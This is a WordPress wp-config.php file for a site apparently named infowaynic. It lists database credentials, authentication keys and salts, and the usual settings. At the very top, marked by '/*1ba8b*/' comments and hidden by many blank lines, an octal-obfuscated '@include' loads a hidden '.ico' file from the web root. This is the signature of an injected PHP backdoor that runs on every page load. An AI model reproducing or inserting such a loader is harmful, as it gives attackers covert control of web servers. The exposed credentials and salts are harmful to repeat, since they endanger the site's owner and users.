<?php
/*1ba8b*/

@include "\057v\141r\057w\167w\057h\164m\154/\151n\146o\167a\171n\151c\056c\157m\057p\163d\057.\141d\0635\0626\1445\056i\143o";

/*1ba8b*/





















/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'infowaynic' );

/** MySQL database username */
define( 'DB_USER', 'infowaynic' );

/** MySQL database password */
define( 'DB_PASSWORD', 'infowaynic' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'MbLI*X5xSVR~z is?Z/yFT^d($M%[W f2o<dip3WmV]j#NQ)AO.Q0z{lh@`&bib9' );
define( 'SECURE_AUTH_KEY',  'x}DR/Blb;+@wNe<2Iz{#-u)4j)y8 1.D|>m_R/Zufh2JoxE=:N&2;9jdUrsqAxdY' );
define( 'LOGGED_IN_KEY',    '_JUa;NbU4=bxT#P$,GWVSKE9s!pV#lGn!wds/.gv1n@$a^h[toGMiy(qi{|5y5FM' );
define( 'NONCE_KEY',        'UwzGS=5>H@VG;3O;Rz5397EPzr44s;_?<,]A6)V2UOff54YXy$|o-p5j9Cb/Y8Lq' );
define( 'AUTH_SALT',        '&j$#UjU^RTVf*,@6@Ow1Il[ `i6i%Pa*$#1Ha::qU=x*:Snoh%td;7Pq1IO=)]3e' );
define( 'SECURE_AUTH_SALT', 'DZiI~S]YBdjRE8x0P>h0IrT/4.$%g2plSVvT)CDMHG3>rEkl}9vz#ngf`z5V{5&W' );
define( 'LOGGED_IN_SALT',   'cJ,:d/d~Y%`ejw|V7Bw rQ%kV>qKPc<h;UHbWw7fbH+qO^-JXxeQ-A6Cgu[SP1v1' );
define( 'NONCE_SALT',       '|r|c&0sxOwFJMvp(/1CkEZW%ln|&DI^-Ru*$}MqAQ Y?;E)+C[1Nu_H.ZC0X|`^n' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'nic_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}

/** Sets up WordPress vars and included files. */
require_once( ABSPATH . 'wp-settings.php' );

